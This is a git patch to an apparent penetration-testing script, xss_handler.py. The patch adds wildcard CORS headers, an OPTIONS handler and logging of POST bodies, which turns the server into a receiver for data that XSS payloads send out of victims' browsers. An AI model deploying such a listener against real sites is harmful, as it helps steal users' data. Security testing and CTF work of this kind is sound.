From ffddd34e06f09388f7a81df570ea1d9618261a7a Mon Sep 17 00:00:00 2001
From: Roman Hergenreder <mail@romanh.de>
Date: Mon, 28 Sep 2020 15:44:39 +0200
Subject: [PATCH] XSS

---
 xss_handler.py | 17 ++++++++++++++++-
 1 file changed, 16 insertions(+), 1 deletion(-)

diff --git a/xss_handler.py b/xss_handler.py
index b8afdc8..34d4224 100755
--- a/xss_handler.py
+++ b/xss_handler.py
@@ -1,6 +1,6 @@
 #!/usr/bin/env python
 
-import util
+from hackingscripts import util
 import sys
 import http.server
 import socketserver
@@ -46,8 +46,23 @@ class XssServer(BaseHTTPRequestHandler):
     def do_HEAD(self):
         self._set_headers()
 
+    def end_headers(self):
+        self.send_header('Access-Control-Allow-Origin', '*')
+        BaseHTTPRequestHandler.end_headers(self)
+
+    def do_OPTIONS(self):
+        self.send_response(200, "ok")
+        self.send_header('Access-Control-Allow-Origin', '*')
+        self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
+        # self.send_header("Access-Control-Allow-Headers", "X-Requested-With")
+        # self.send_header("Access-Control-Allow-Headers", "Content-Type")
+        self.end_headers()
+
     def do_POST(self):
         self._set_headers()
+        content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
+        post_data = self.rfile.read(content_length)
+        print(post_data)
         self.wfile.write(self._html())
 
 if __name__ == "__main__":